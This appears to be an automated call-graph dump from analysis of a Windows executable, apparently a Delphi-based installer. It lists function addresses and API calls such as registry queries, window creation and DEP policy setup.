42d8a8 GetWindowsDirectoryA 51251->51635 51253 47c3c2 51254 403450 4 API calls 51253->51254 51255 47c3cf 51254->51255 51637 42d8d4 GetSystemDirectoryA 51255->51637 51257 47c3d7 51258 403450 4 API calls 51257->51258 51259 47c3e4 51258->51259 51639 42d900 51259->51639 51261 47c3ec 51262 403450 4 API calls 51261->51262 51263 47c3f9 51262->51263 51264 47c402 51263->51264 51265 47c41e 51263->51265 51695 42d218 51264->51695 51266 403400 4 API calls 51265->51266 51268 47c41c 51266->51268 51270 47c463 51268->51270 51272 42c8dc 5 API calls 51268->51272 51643 47c22c 51270->51643 51271 403450 4 API calls 51271->51268 51274 47c43e 51272->51274 51276 403450 4 API calls 51274->51276 51278 47c44b 51276->51278 51277 403450 4 API calls 51279 47c47f 51277->51279 51278->51270 51283 403450 4 API calls 51278->51283 51280 47c49d 51279->51280 51281 4035c0 4 API calls 51279->51281 51282 47c22c 8 API calls 51280->51282 51281->51280 51284 47c4ac 51282->51284 51283->51270 51285 403450 4 API calls 51284->51285 51286 47c4b9 51285->51286 51287 47c4e1 51286->51287 51288 42c40c 5 API calls 51286->51288 51289 47c548 51287->51289 51293 47c22c 8 API calls 51287->51293 51290 47c4cf 51288->51290 51291 47c572 51289->51291 51292 47c551 51289->51292 51295 4035c0 4 API calls 51290->51295 51654 42c40c 51291->51654 51296 42c40c 5 API calls 51292->51296 51297 47c4f9 51293->51297 51295->51287 51300 403450 4 API calls 51297->51300 51558->51131 51560->51128 51561->51125 51562->51126 51563->51138 51564->51142 51565->51142 51633->51248 51636 42d8c9 51635->51636 51636->51253 51638 42d8f5 51637->51638 51638->51257 51640 403400 4 API calls 51639->51640 51641 42d910 GetModuleHandleA GetProcAddress 51640->51641 51642 42d929 51641->51642 51642->51261 51705 42de2c 51643->51705 51645 47c252 51646 47c256 51645->51646 51647 47c278 51645->51647 51708 42dd5c 51646->51708 51648 403400 4 API calls 51647->51648 51650 47c27f 51648->51650 51650->51277 51652 47c26d RegCloseKey 51652->51650 51653 403400 4 API calls 51653->51652 51696 4038a4 4 API calls 51695->51696 51697 42d22b 51696->51697 51698 42d242 GetEnvironmentVariableA 51697->51698 51702 42d255 51697->51702 51743 42dbe0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 51697->51743 51698->51697 51699 42d24e 51698->51699 51700 403400 4 API calls 51699->51700 51700->51702 51702->51271 51706 42de37 51705->51706 51707 42de3d RegOpenKeyExA 51705->51707 51706->51707 51707->51645 51711 42dc10 51708->51711 51712 42dc36 RegQueryValueExA 51711->51712 51713 42dc7b 51712->51713 51718 42dc59 51712->51718 51714 403400 4 API calls 51713->51714 51715 42dd47 51714->51715 51715->51652 51715->51653 51716 42dc73 51717 403400 4 API calls 51716->51717 51717->51713 51718->51713 51718->51716 51719 4034e0 4 API calls 51718->51719 51728 403744 51718->51728 51719->51718 51721 42dcb0 RegQueryValueExA 51721->51712 51722 42dccc 51721->51722 51722->51713 51732 4038a4 51722->51732 51725 42dd20 51727 403744 4 API calls 51727->51725 51729 40374a 51728->51729 51731 40375b 51728->51731 51730 4034bc 4 API calls 51729->51730 51729->51731 51730->51731 51731->51721 51733 4038b1 51732->51733 51734 4038e1 51732->51734 51736 4038da 51733->51736 51738 4038bd 51733->51738 51735 403400 4 API calls 51734->51735 51737 4038cb 51735->51737 51739 4034bc 4 API calls 51736->51739 51737->51725 51737->51727 51741 402678 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 51738->51741 51739->51734 51741->51737 51743->51697 53804 46be48 53805 46be7c 53804->53805 53839 46c254 53804->53839 53806 46beb8 53805->53806 53808 46bf14 53805->53808 53809 46bef2 53805->53809 53810 46bf03 53805->53810 53811 46bed0 53805->53811 53812 46bee1 53805->53812 53806->53839 53890 468fe0 53806->53890 53807 403400 4 API calls 53814 46c293 53807->53814 54122 46bdd8 45 API calls 53808->54122 53855 46ba08 53809->53855 54121 46bbc8 67 API calls 53810->54121 54119 46b758 47 API calls 53811->54119 54120 46b8c0 42 API calls 53812->54120 53815 403400 4 API calls 53814->53815 53821 46c29b 53815->53821 53822 46bed6 53822->53806 53822->53839 53823 46bf50 53824 494770 18 API calls 53823->53824 53826 46bf93 53823->53826 53823->53839 53824->53826 53827 46c0b6 53826->53827 53828 414af8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53826->53828 53831 42cbd0 6 API calls 53826->53831 53834 46b2a0 23 API calls 53826->53834 53835 403450 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53826->53835 53838 46c136 53826->53838 53826->53839 53842 46c18e 53826->53842 53851 46c17c 53826->53851 53893 468f1c 53826->53893 53901 46b00c 53826->53901 53908 46a26c 53826->53908 54046 482b0c 53826->54046 54132 46b514 19 API calls 53826->54132 54123 48300c 123 API calls 53827->54123 53828->53826 53831->53826 53832 46c0d1 53832->53839 53834->53826 53835->53826 53840 457d58 24 API calls 53838->53840 53839->53807 53843 46c155 53840->53843 53841 46b2a0 23 API calls 53841->53839 53969 46b2a0 53842->53969 53845 457d58 24 API calls 53843->53845 53845->53851 53846 46c19b 53847 46c1c4 SetActiveWindow 53846->53847 53848 46c1dc 53846->53848 53847->53848 54004 46a60c 53848->54004 53850 46c1ff 53850->53851 53852 46c21a 53850->53852 53851->53841 54124 46b11c 53852->54124 54133 46c6cc 53855->54133 53858 46bb8a 53859 403420 4 API calls 53858->53859 53861 46bba4 53859->53861 53863 403400 4 API calls 53861->53863 53862 46ba56 53888 46bb76 53862->53888 54140 455f70 13 API calls 53862->54140 53866 46bbac 53863->53866 53865 403450 4 API calls 53865->53858 53867 403400 4 API calls 53866->53867 53868 46bbb4 53867->53868 53868->53806 53869 46ba74 53870 46bad9 53869->53870 54141 46696c 53869->54141 53870->53858 53871 46bb39 53870->53871 53872 42cd58 7 API calls 53870->53872 53871->53858 53875 42cd58 7 API calls 53871->53875 53871->53888 53873 46bb12 53872->53873 53873->53871 53877 451444 4 API calls 53873->53877 53878 46bb4f 53875->53878 53880 46bb29 53877->53880 53881 451444 4 API calls 53878->53881 53878->53888 53879 46696c 19 API calls 53882 46bab4 53879->53882 54146 47eadc 42 API calls 53880->54146 53884 46bb66 53881->53884 53885 451414 4 API calls 53882->53885 54147 47eadc 42 API calls 53884->54147 53887 46bac9 53885->53887 54145 47eadc 42 API calls 53887->54145 53888->53858 53888->53865 53891 468f1c 19 API calls 53890->53891 53892 468fef 53891->53892 53892->53823 53896 468f4b 53893->53896 53894 4078fc 19 API calls 53895 468f84 53894->53895 54267 453330 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53895->54267 53896->53894 53898 468f8c 53896->53898 53899 403400 4 API calls 53898->53899 53900 468fa4 53899->53900 53900->53826 53902 46b01d 53901->53902 53904 46b018 53901->53904 54353 469dec 46 API calls 53902->54353 53903 46b01b 53903->53826 53904->53903 54268 46aa78 53904->54268 53906 46b025 53906->53826 53909 403400 4 API calls 53908->53909 53910 46a299 53909->53910 54376 47d9bc 53910->54376 53912 46a2f8 53913 46a315 53912->53913 53914 46a2fc 53912->53914 53915 46a306 53913->53915 54386 494660 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53913->54386 54383 466b6c 53914->54383 53919 46a434 53915->53919 53920 46a49f 53915->53920 53968 46a5a9 53915->53968 53918 46a331 53918->53915 53922 46a339 53918->53922 53923 403494 4 API calls 53919->53923 53924 403494 4 API calls 53920->53924 53921 403420 4 API calls 53925 46a5d3 53921->53925 53926 46b2a0 23 API calls 53922->53926 53927 46a441 53923->53927 53928 46a4ac 53924->53928 53925->53826 53936 46a346 53926->53936 53929 40357c 4 API calls 53927->53929 53930 40357c 4 API calls 53928->53930 53931 46a44e 53929->53931 53932 46a4b9 53930->53932 53933 40357c 4 API calls 53931->53933 53934 40357c 4 API calls 53932->53934 53937 46a45b 53933->53937 53935 46a4c6 53934->53935 53939 40357c 4 API calls 53935->53939 53942 46a387 53936->53942 53943 46a36f SetActiveWindow 53936->53943 53938 40357c 4 API calls 53937->53938 53940 46a468 53938->53940 53941 46a4d3 53939->53941 53944 466b6c 20 API calls 53940->53944 53945 40357c 4 API calls 53941->53945 54387 42f570 53942->54387 53943->53942 53946 46a476 53944->53946 53947 46a4e1 53945->53947 53948 40357c 4 API calls 53946->53948 53949 414b28 4 API calls 53947->53949 53952 46a47f 53948->53952 53959 46a49d 53949->53959 53954 40357c 4 API calls 53952->53954 53957 46a48c 53954->53957 53956 46a3d8 53960 46b11c 21 API calls 53956->53960 53958 414b28 4 API calls 53957->53958 53958->53959 54404 466ea4 53959->54404 53961 46a40a 53960->53961 53961->53826 53962 46a503 53963 414b28 4 API calls 53962->53963 53962->53968 53964 46a566 53963->53964 53968->53921 53970 468fe0 19 API calls 53969->53970 53971 46b2b8 53970->53971 53972 46b2da 53971->53972 53973 465638 7 API calls 53971->53973 54523 465638 53972->54523 53973->53972 53977 46b2f2 53978 46b11c 21 API calls 53977->53978 53979 46b32a 53978->53979 53980 414b28 4 API calls 53979->53980 53981 46b33e 53980->53981 53982 46b374 53981->53982 53983 46b34a 53981->53983 53986 46b393 53982->53986 53987 46b3bd 53982->53987 53984 414b28 4 API calls 53983->53984 53985 46b35e 53984->53985 53989 414b28 4 API calls 53985->53989 53990 414b28 4 API calls 53986->53990 53988 414b28 4 API calls 53987->53988 53991 46b3d1 53988->53991 53992 46b372 53989->53992 53993 46b3a7 53990->53993 53994 414b28 4 API calls 53991->53994 54540 46b034 53992->54540 53995 414b28 4 API calls 53993->53995 53994->53992 53995->53992 53998 46b40f 54000 468fe0 19 API calls 53998->54000 54002 46b46f 54000->54002 54001 46b4d2 54001->53846 54002->54001 54545 4946bc 18 API calls 54002->54545 54005 46a637 54004->54005 54006 46a66e 54005->54006 54565 47dc30 54005->54565 54008 46a7e3 54006->54008 54026 46a682 54006->54026 54010 46a817 54008->54010 54017 46a801 54008->54017 54045 46a95a 54008->54045 54009 403400 4 API calls 54012 46a97f 54009->54012 54011 414b28 4 API calls 54010->54011 54018 46a815 54011->54018 54012->53850 54013 46a7c0 54014 46a7db 54013->54014 54019 402660 4 API calls 54013->54019 54014->53850 54015 402660 4 API calls 54015->54026 54016 402648 4 API calls 54016->54026 54021 414b28 4 API calls 54017->54021 54577 495520 MulDiv 54018->54577 54019->54014 54020 46a78c 54023 457d58 24 API calls 54020->54023 54021->54018 54023->54013 54024 46a838 54028 466ea4 11 API calls 54024->54028 54026->54015 54026->54016 54030 46a6f5 54026->54030 54027 457d58 24 API calls 54027->54030 54029 46a86c 54028->54029 54578 466eac KiUserCallbackDispatcher 54029->54578 54030->54013 54030->54020 54030->54027 54032 40357c LocalAlloc TlsSetValue TlsGetValue TlsGetValue 54030->54032 54576 403ba4 7 API calls 54030->54576 54032->54030 54045->54009 54047 46c6cc 48 API calls 54046->54047 54048 482b4f 54047->54048 54049 482b58 54048->54049 54793 408be8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 54048->54793 54051 414af8 4 API calls 54049->54051 54052 482b68 54051->54052 54053 403450 4 API calls 54052->54053 54054 482b75 54053->54054 54603 46ca24 54054->54603 54057 482b85 54059 414af8 4 API calls 54057->54059 54060 482b95 54059->54060 54061 403450 4 API calls 54060->54061 54062 482ba2 54061->54062 54063 469bd4 SendMessageA 54062->54063 54064 482bbb 54063->54064 54065 482c0c 54064->54065 54795 479c64 23 API calls 54064->54795 54067 4241ec 11 API calls 54065->54067 54068 482c16 54067->54068 54069 482c3c 54068->54069 54070 482c27 SetActiveWindow 54068->54070 54632 481f3c 54069->54632 54070->54069 54119->53822 54120->53806 54121->53806 54122->53806 54123->53832 54125 468f1c 19 API calls 54124->54125 54132->53826 54148 46c764 54133->54148 54136 414af8 54137 414b06 54136->54137 54138 4034e0 4 API calls 54137->54138 54139 414b13 54138->54139 54139->53862 54140->53869 54142 466986 54141->54142 54143 4078fc 19 API calls 54142->54143 54144 4669c1 54143->54144 54144->53879 54145->53870 54146->53871 54147->53888 54149 414af8 4 API calls 54148->54149 54150 46c798 54149->54150 54209 466c04 54150->54209 54154 46c7aa 54155 46c7b9 54154->54155 54157 46c7d2 54154->54157 54243 47eadc 42 API calls 54155->54243 54160 46c819 54157->54160 54162 46c800 54157->54162 54158 403420 4 API calls 54159 46ba3a 54158->54159 54159->53858 54159->54136 54161 46c87e 54160->54161 54167 46c81d 54160->54167 54246 42cb5c CharNextA 54161->54246 54244 47eadc 42 API calls 54162->54244 54165 46c88d 54166 46c891 54165->54166 54171 46c8aa 54165->54171 54247 47eadc 42 API calls 54166->54247 54169 46c865 54167->54169 54167->54171 54245 47eadc 42 API calls 54169->54245 54172 46c8ce 54171->54172 54223 466d74 54171->54223 54248 47eadc 42 API calls 54172->54248 54173 46c7cd 54173->54158 54179 46c8e7 54180 403778 4 API calls 54179->54180 54181 46c8fd 54180->54181 54231 42c9ac 54181->54231 54184 46c90e 54249 466e00 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 54184->54249 54185 46c93f 54186 42c8dc 5 API calls 54185->54186 54188 46c94a 54186->54188 54190 42c40c 5 API calls 54188->54190 54189 46c921 54191 451444 4 API calls 54189->54191 54192 46c955 54190->54192 54193 46c92e 54191->54193 54194 42cbd0 6 API calls 54192->54194 54250 47eadc 42 API calls 54193->54250 54196 46c960 54194->54196 54235 46c6f8 54196->54235 54198 46c968 54199 42cd58 7 API calls 54198->54199 54200 46c970 54199->54200 54201 46c974 54200->54201 54202 46c98a 54200->54202 54251 47eadc 42 API calls 54201->54251 54202->54173 54204 46c994 54202->54204 54205 46c99c GetDriveTypeA 54204->54205 54205->54173 54213 466c1e 54209->54213 54210 406bb8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 54210->54213 54212 42cbd0 6 API calls 54212->54213 54213->54210 54213->54212 54214 403450 4 API calls 54213->54214 54215 466c67 54213->54215 54253 42cabc 54213->54253 54214->54213 54216 403420 4 API calls 54215->54216 54217 466c81 54216->54217 54218 414b28 54217->54218 54219 414af8 4 API calls 54218->54219 54220 414b4c 54219->54220 54221 403400 4 API calls 54220->54221 54222 414b7d 54221->54222 54222->54154 54224 466d7e 54223->54224 54225 466d91 54224->54225 54264 42cb4c CharNextA 54224->54264 54225->54172 54227 466da4 54225->54227 54228 466dae 54227->54228 54229 466ddb 54228->54229 54265 42cb4c CharNextA 54228->54265 54229->54172 54229->54179 54232 42ca05 54231->54232 54233 42c9c2 54231->54233 54232->54184 54232->54185 54233->54232 54266 42cb4c CharNextA 54233->54266 54236 46c75d 54235->54236 54237 46c70b 54235->54237 54236->54198 54237->54236 54238 41eeb4 2 API calls 54237->54238 54239 46c71b 54238->54239 54240 46c735 SHPathPrepareForWriteA 54239->54240 54241 41ef68 6 API calls 54240->54241 54242 46c755 54241->54242 54242->54198 54243->54173 54244->54173 54245->54173 54246->54165 54247->54173 54248->54173 54249->54189 54250->54173 54251->54173 54254 403494 4 API calls 54253->54254 54255 42cacc 54254->54255 54256 403744 4 API calls 54255->54256 54259 42cb02 54255->54259 54262 42c454 IsDBCSLeadByte 54255->54262 54256->54255 54258 42cb46 54258->54213 54259->54258 54261 4037b8 4 API calls 54259->54261 54263 42c454 IsDBCSLeadByte 54259->54263 54261->54259 54262->54255 54263->54259 54264->54224 54265->54228 54266->54233 54267->53898 54270 46aabf 54268->54270 54269 46af37 54271 46af52 54269->54271 54272 46af83 54269->54272 54270->54269 54273 46ab7a 54270->54273 54275 403494 4 API calls 54270->54275 54274 403494 4 API calls 54271->54274 54276 403494 4 API calls 54272->54276 54277 46ab9b 54273->54277 54282 46abdc 54273->54282 54279 46af60 54274->54279 54280 46aafe 54275->54280 54281 46af91 54276->54281 54278 403494 4 API calls 54277->54278 54283 46aba9 54278->54283 54371 4694c8 12 API calls 54279->54371 54285 414af8 4 API calls 54280->54285 54372 4694c8 12 API calls 54281->54372 54286 403400 4 API calls 54282->54286 54288 414af8 4 API calls 54283->54288 54289 46ab1f 54285->54289 54290 46abda 54286->54290 54292 46abca 54288->54292 54293 403634 4 API calls 54289->54293 54309 46acc0 54290->54309 54354 469bd4 54290->54354 54291 46af6e 54294 403400 4 API calls 54291->54294 54295 403634 4 API calls 54292->54295 54296 46ab2f 54293->54296 54298 46afb4 54294->54298 54295->54290 54300 414af8 4 API calls 54296->54300 54303 403400 4 API calls 54298->54303 54299 46ad48 54301 403400 4 API calls 54299->54301 54304 46ab43 54300->54304 54305 46ad46 54301->54305 54302 46abfc 54306 46ac02 54302->54306 54307 46ac3a 54302->54307 54308 46afbc 54303->54308 54304->54273 54316 414af8 4 API calls 54304->54316 54366 46a010 43 API calls 54305->54366 54311 403494 4 API calls 54306->54311 54310 403400 4 API calls 54307->54310 54312 403420 4 API calls 54308->54312 54309->54299 54314 46ad07 54309->54314 54315 46ac38 54310->54315 54317 46ac10 54311->54317 54313 46afc9 54312->54313 54313->53903 54318 403494 4 API calls 54314->54318 54360 469ec8 54315->54360 54319 46ab6a 54316->54319 54321 47bfd8 43 API calls 54317->54321 54323 46ad15 54318->54323 54324 403634 4 API calls 54319->54324 54322 46ac28 54321->54322 54326 403634 4 API calls 54322->54326 54327 414af8 4 API calls 54323->54327 54324->54273 54325 46ad71 54331 46add2 54325->54331 54332 46ad7c 54325->54332 54326->54315 54329 46ad36 54327->54329 54333 403634 4 API calls 54329->54333 54330 46ac61 54338 46acc2 54330->54338 54339 46ac6c 54330->54339 54335 403400 4 API calls 54331->54335 54334 403494 4 API calls 54332->54334 54333->54305 54337 46ad8a 54334->54337 54336 46adda 54335->54336 54343 46ae83 54336->54343 54344 46add0 54336->54344 54337->54336 54337->54344 54348 403634 4 API calls 54337->54348 54340 403400 4 API calls 54338->54340 54341 403494 4 API calls 54339->54341 54340->54309 54342 46ac7a 54341->54342 54342->54309 54349 403634 4 API calls 54342->54349 54369 429104 SendMessageA 54343->54369 54344->54336 54367 494660 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 54344->54367 54346 46adfd 54346->54343 54368 49490c 18 API calls 54346->54368 54348->54337 54349->54342 54351 46af24 54370 429154 SendMessageA SendMessageA 54351->54370 54353->53906 54373 42a050 SendMessageA 54354->54373 54356 469be3 54357 469c03 54356->54357 54374 42a050 SendMessageA 54356->54374 54357->54302 54359 469bf3 54359->54302 54364 469ef5 54360->54364 54361 469f57 54362 403400 4 API calls 54361->54362 54363 469f6c 54362->54363 54363->54330 54364->54361 54375 469e4c 43 API calls 54364->54375 54366->54325 54367->54346 54368->54343 54369->54351 54370->54269 54371->54291 54372->54291 54373->54356 54374->54359 54375->54364 54377 47d9cf 54376->54377 54380 47da0c 54376->54380 54408 455cf8 54377->54408 54380->53912 54382 47da1f 54382->53912 54463 466a80 54383->54463 54386->53918 54388 42f57c 54387->54388 54389 42f59f GetActiveWindow GetFocus 54388->54389 54390 41eeb4 2 API calls 54389->54390 54391 42f5b6 54390->54391 54392 42f5d3 54391->54392 54393 42f5c3 RegisterClassA 54391->54393 54394 42f662 SetFocus 54392->54394 54395 42f5e1 CreateWindowExA 54392->54395 54393->54392 54396 403400 4 API calls 54394->54396 54395->54394 54397 42f614 54395->54397 54398 42f67e 54396->54398 54484 42428c 54397->54484 54403 49490c 18 API calls 54398->54403 54400 42f63c 54401 42f644 CreateWindowExA 54400->54401 54401->54394 54402 42f65a ShowWindow 54401->54402 54402->54394 54403->53956 54490 44b524 54404->54490 54406 466eab 54406->53962 54409 455d09 54408->54409 54410 455d16 54409->54410 54411 455d0d 54409->54411 54442 455adc 29 API calls 54410->54442 54434 4559fc 54411->54434 54414 455d13 54414->54380 54415 47d628 54414->54415 54421 47d726 54415->54421 54423 47d665 54415->54423 54416 47d6c9 54417 403420 4 API calls 54416->54417 54418 47d80e 54417->54418 54418->54382 54419 47954c 19 API calls 54419->54421 54421->54416 54421->54419 54428 47d77c 54421->54428 54422 4797f0 4 API calls 54422->54423 54423->54416 54423->54421 54423->54422 54427 47bfd8 43 API calls 54423->54427 54432 47d6d2 54423->54432 54451 47968c 54423->54451 54424 47bfd8 43 API calls 54424->54428 54425 47bfd8 43 API calls 54425->54432 54426 4540ec 20 API calls 54426->54428 54427->54423 54428->54421 54428->54424 54428->54426 54430 47d713 54428->54430 54429 42c93c 5 API calls 54429->54432 54430->54416 54431 42c964 5 API calls 54431->54432 54432->54423 54432->54425 54432->54429 54432->54430 54432->54431 54462 47d334 52 API calls 54432->54462 54435 42de2c RegOpenKeyExA 54434->54435 54436 455a19 54435->54436 54437 455a67 54436->54437 54443 455930 54436->54443 54437->54414 54440 455930 6 API calls 54441 455a48 RegCloseKey 54440->54441 54441->54414 54442->54414 54448 42dd68 54443->54448 54445 403420 4 API calls 54446 4559e2 54445->54446 54446->54440 54447 455958 54447->54445 54449 42dc10 6 API calls 54448->54449 54450 42dd71 54449->54450 54450->54447 54452 4796a2 54451->54452 54453 47969e 54451->54453 54454 403450 4 API calls 54452->54454 54453->54423 54455 4796af 54454->54455 54456 4796b5 54455->54456 54457 4796cf 54455->54457 54458 47954c 19 API calls 54456->54458 54459 47954c 19 API calls 54457->54459 54460 4796cb 54458->54460 54459->54460 54461 403400 4 API calls 54460->54461 54461->54453 54462->54432 54464 403494 4 API calls 54463->54464 54465 466aae 54464->54465 54466 42dbd8 5 API calls 54465->54466 54467 466ac0 54466->54467 54468 42dbd8 5 API calls 54467->54468 54469 466ad2 54468->54469 54470 46696c 19 API calls 54469->54470 54471 466adc 54470->54471 54472 42dbd8 5 API calls 54471->54472 54473 466aeb 54472->54473 54480 4669e4 54473->54480 54476 42dbd8 5 API calls 54477 466b04 54476->54477 54478 403400 4 API calls 54477->54478 54479 466b19 54478->54479 54479->53915 54481 466a04 54480->54481 54482 4078fc 19 API calls 54481->54482 54483 466a4e 54482->54483 54483->54476 54485 4242be 54484->54485 54486 42429e GetWindowTextA 54484->54486 54488 403494 4 API calls 54485->54488 54487 4034e0 4 API calls 54486->54487 54489 4242bc 54487->54489 54488->54489 54489->54400 54493 44b39c 54490->54493 54492 44b537 54492->54406 54494 44b3cf 54493->54494 54495 414af8 4 API calls 54494->54495 54498 44b3e2 54495->54498 54496 44b40f 73A0A570 54504 41a1f8 54496->54504 54497 40357c 4 API calls 54497->54496 54498->54496 54498->54497 54501 44b440 54512 44b0d0 54501->54512 54503 44b454 73A0A480 54503->54492 54505 41a223 54504->54505 54506 41a2bf 54504->54506 54509 403520 4 API calls 54505->54509 54507 403400 4 API calls 54506->54507 54508 41a2d7 SelectObject 54507->54508 54508->54501 54510 41a27b 54509->54510 54511 41a2b3 CreateFontIndirectA 54510->54511 54511->54506 54513 44b0e7 54512->54513 54514 44b17a 54513->54514 54515 44b163 54513->54515 54516 44b0fa 54513->54516 54514->54503 54517 44b173 DrawTextA 54515->54517 54516->54514 54518 402648 4 API calls 54516->54518 54517->54514 54519 44b10b 54518->54519 54520 44b129 MultiByteToWideChar DrawTextW 54519->54520 54521 402660 4 API calls 54520->54521 54522 44b15b 54521->54522 54522->54503 54526 465643 54523->54526 54524 46571e 54534 4673f8 54524->54534 54525 4656d6 54525->54524 54552 4185c8 7 API calls 54525->54552 54526->54524 54529 465693 54526->54529 54546 421a2c 54526->54546 54529->54525 54530 4656cd 54529->54530 54531 4656d8 54529->54531 54533 421a2c 7 API calls 54530->54533 54532 421a2c 7 API calls 54531->54532 54532->54525 54533->54525 54535 467428 54534->54535 54536 467409 54534->54536 54535->53977 54537 414b28 4 API calls 54536->54537 54538 467417 54537->54538 54539 414b28 4 API calls 54538->54539 54539->54535 54542 46b041 54540->54542 54541 421a2c 7 API calls 54543 46b0cc 54541->54543 54542->54541 54543->53998 54544 466ecc 18 API calls 54543->54544 54544->53998 54545->54001 54547 421a84 54546->54547 54550 421a3a 54546->54550 54547->54529 54548 421a69 54548->54547 54561 421d38 SetFocus GetFocus 54548->54561 54550->54548 54553 408cc4 54550->54553 54552->54524 54554 408cd0 54553->54554 54562 406df4 LoadStringA 54554->54562 54557 403450 4 API calls 54558 408d01 54557->54558 54559 403400 4 API calls 54558->54559 54560 408d16 54559->54560 54560->54548 54561->54547 54563 4034e0 4 API calls 54562->54563 54564 406e21 54563->54564 54564->54557 54566 402648 4 API calls 54565->54566 54567 47dc4c 54566->54567 54568 47d628 61 API calls 54567->54568 54569 47dc6b 54568->54569 54571 47dc7f 54569->54571 54581 47da48 54569->54581 54572 47dcab 54571->54572 54574 402660 4 API calls 54571->54574 54573 402660 4 API calls 54572->54573 54575 47dcb5 54573->54575 54574->54571 54575->54006 54576->54030 54577->54024 54582 403494 4 API calls 54581->54582 54592 47da75 54582->54592 54583 47dad8 54584 47dac8 54584->54583 54586 47db44 54584->54586 54594 402660 4 API calls 54584->54594 54586->54583 54592->54584 54597 42c93c 5 API calls 54592->54597 54601 42e8b0 CharNextA 54592->54601 54594->54584 54597->54592 54601->54592 54604 46ca4d 54603->54604 54605 414af8 4 API calls 54604->54605 54615 46ca9a 54604->54615 54606 46ca63 54605->54606 54802 466c90 6 API calls 54606->54802 54607 403420 4 API calls 54609 46cb44 54607->54609 54609->54057 54794 408be8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 54609->54794 54610 46ca6b 54611 414b28 4 API calls 54610->54611 54612 46ca79 54611->54612 54613 46ca86 54612->54613 54617 46ca9f 54612->54617 54803 47eadc 42 API calls 54613->54803 54615->54607 54616 46cab7 54804 47eadc 42 API calls 54616->54804 54617->54616 54618 466d74 CharNextA 54617->54618 54620 46cab3 54618->54620 54620->54616 54621 46cacd 54620->54621 54622 46cad3 54621->54622 54623 46cae9 54621->54623 54805 47eadc 42 API calls 54622->54805 54625 42c9ac CharNextA 54623->54625 54626 46caf6 54625->54626 54626->54615 54806 466e00 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 54626->54806 54628 46cb0d 54629 451444 4 API calls 54628->54629 54630 46cb1a 54629->54630 54807 47eadc 42 API calls 54630->54807 54633 481f8d 54632->54633 54634 481f5f 54632->54634 54636 475dbc 54633->54636 54808 4946bc 18 API calls 54634->54808 54637 457b4c 24 API calls 54636->54637 54638 475e08 54637->54638 54639 4072b0 SetCurrentDirectoryA 54638->54639 54640 475e12 54639->54640 54809 46e5b0 54640->54809 54644 475e22 54817 45a4ac 54644->54817 54795->54065 54802->54610 54803->54615 54804->54615 54805->54615 54806->54628 54807->54615 54808->54633 54810 46e623 54809->54810 54812 46e5cd 54809->54812 54813 46e628 54810->54813 54811 47968c 19 API calls 54811->54812 54812->54810 54812->54811 54814 46e64e 54813->54814 55257 44fb08 54814->55257 54816 46e6aa 54816->54644 55260 44fb1c 55257->55260 55261 44fb2d 55260->55261 55262 44fb19 55261->55262 55263 44fb57 MulDiv 55261->55263 55262->54816 55264 4181f0 55263->55264 55265 44fb82 SendMessageA 55264->55265 55265->55262 56677 498578 56735 403344 56677->56735 56679 498586 56738 4056a0 56679->56738 56681 49858b 56741 406334 GetModuleHandleA GetProcAddress 56681->56741 56687 49859a 56758 410964 56687->56758 56689 49859f 56762 412938 56689->56762 56691 4985a9 56767 419050 GetVersion 56691->56767 57008 4032fc 56735->57008 56737 403349 GetModuleHandleA GetCommandLineA 56737->56679 56740 4056db 56738->56740 57009 4033bc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56738->57009 56740->56681 56742 406350 56741->56742 56743 406357 GetProcAddress 56741->56743 56742->56743 56744 406366 56743->56744 56745 40636d GetProcAddress 56743->56745 56744->56745 56746 406380 56745->56746 56747 40637c SetProcessDEPPolicy 56745->56747 56748 409954 56746->56748 56747->56746 57010 40902c 56748->57010 56753 408728 7 API calls 56754 409977 56753->56754 57025 409078 GetVersionExA 56754->57025 56757 409b88 6F541CD0 56757->56687 56759 41096e 56758->56759 56760 4109ad GetCurrentThreadId 56759->56760 56761 4109c8 56760->56761 56761->56689 57027 40af0c 56762->57027 56766 412964 56766->56691 57039 41de34 8 API calls 56767->57039 56769 419069 57041 418f48 GetCurrentProcessId 56769->57041 57008->56737 57009->56740 57011 408cc4 5 API calls 57010->57011 57012 40903d 57011->57012 57013 4085e4 GetSystemDefaultLCID 57012->57013 57017 40861a 57013->57017 57014 406df4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 57014->57017 57015 408570 LocalAlloc TlsSetValue TlsGetValue TlsGetValue GetLocaleInfoA 57015->57017 57016 403450 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 57016->57017 57017->57014 57017->57015 57017->57016 57021 40867c 57017->57021 57018 408570 LocalAlloc TlsSetValue TlsGetValue TlsGetValue GetLocaleInfoA 57018->57021 57019 403450 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 57019->57021 57020 406df4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 57020->57021 57021->57018 57021->57019 57021->57020 57022 4086ff 57021->57022 57023 403420 4 API calls 57022->57023 57024 408719 57023->57024 57024->56753 57026 40908f 57025->57026 57026->56757 57028 40af13 57027->57028 57028->57028 57029 40af32 57028->57029 57038 40ae44 19 API calls 57028->57038 57031 41101c 57029->57031 57032 41103e 57031->57032 57033 406df4 5 API calls 57032->57033 57034 403450 4 API calls 57032->57034 57035 41105d 57032->57035 57033->57032 57034->57032 57036 403400 4 API calls 57035->57036 57037 411072 57036->57037 57037->56766 57038->57028 57040 41deae 57039->57040 57040->56769 58316 42f530 58317 42f53b 58316->58317 58318 42f53f NtdllDefWindowProc_A 58316->58318 58318->58317 56309 416b52 56310 416bfa 56309->56310 56311 416b6a 56309->56311 56328 41532c LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56310->56328 56313 416b84 SendMessageA 56311->56313 56314 416b78 56311->56314 56315 416bd8 56313->56315 56316 416b82 CallWindowProcA 56314->56316 56317 416b9e 56314->56317 56316->56315 56325 41a068 GetSysColor 56317->56325 56320 416ba9 SetTextColor 56321 416bbe 